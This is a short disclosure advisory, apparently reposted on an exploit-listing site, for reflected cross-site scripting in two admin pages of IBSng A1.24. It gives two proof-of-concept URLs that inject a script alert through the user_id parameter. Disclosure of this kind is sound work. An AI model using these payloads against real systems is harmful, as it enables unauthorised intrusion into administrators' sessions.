IBSng Version A1.24 Cross Site Scripting Vulnerability

2013.08.06

Credit: IRaNHaCK Security Team

Risk: Low

Local: No

Remote: No

CVE: N/A

CWE: CWE-79

-============== In The Name Of God ==============-
# Title : IBSng Version A1.24 Cross Site Scripting Vulnerability
# Author : IRaNHaCK Security Team
# Tested on : 7 , Xp , Backtrack
# Vendor : http://ibs.sourceforge.net/
# Date : 2013-08-05
# Our Website : WWW.IRaNHaCK.ORG
<------------------------------------------>
-==========<XsS>==========-
1- Http://127.0.0.1/IBSng/admin/report/realtime_web_analyzer.php?username=[Username]&user_id=<script>alert(/IRaNHaCK/)</script>
2- Http://127.0.0.1/IBSng/admin/user/change_credit.php?user_id=<script>alert(/IRaNHaCK/)</script>
<------------------------------------------>
Greetz : Mr.XpR - Secret.Walker - V30Sharp - FarbodEZRaeL - AL1R3Z4 - Mr.a!i - ZeroKilleR - Mr.FixXxer - @3is - mr.3lr0n - r0bb3r68
M.R.S.CO - Mr.Cicili - Navid Black Hat - FTA_boy - Mh0122 & All Of Our Friends
./MojiRider
./Persian Gulf For EVER

References:

http://ibs.sourceforge.net/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

IBSng Version A1.24 Cross Site Scripting Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.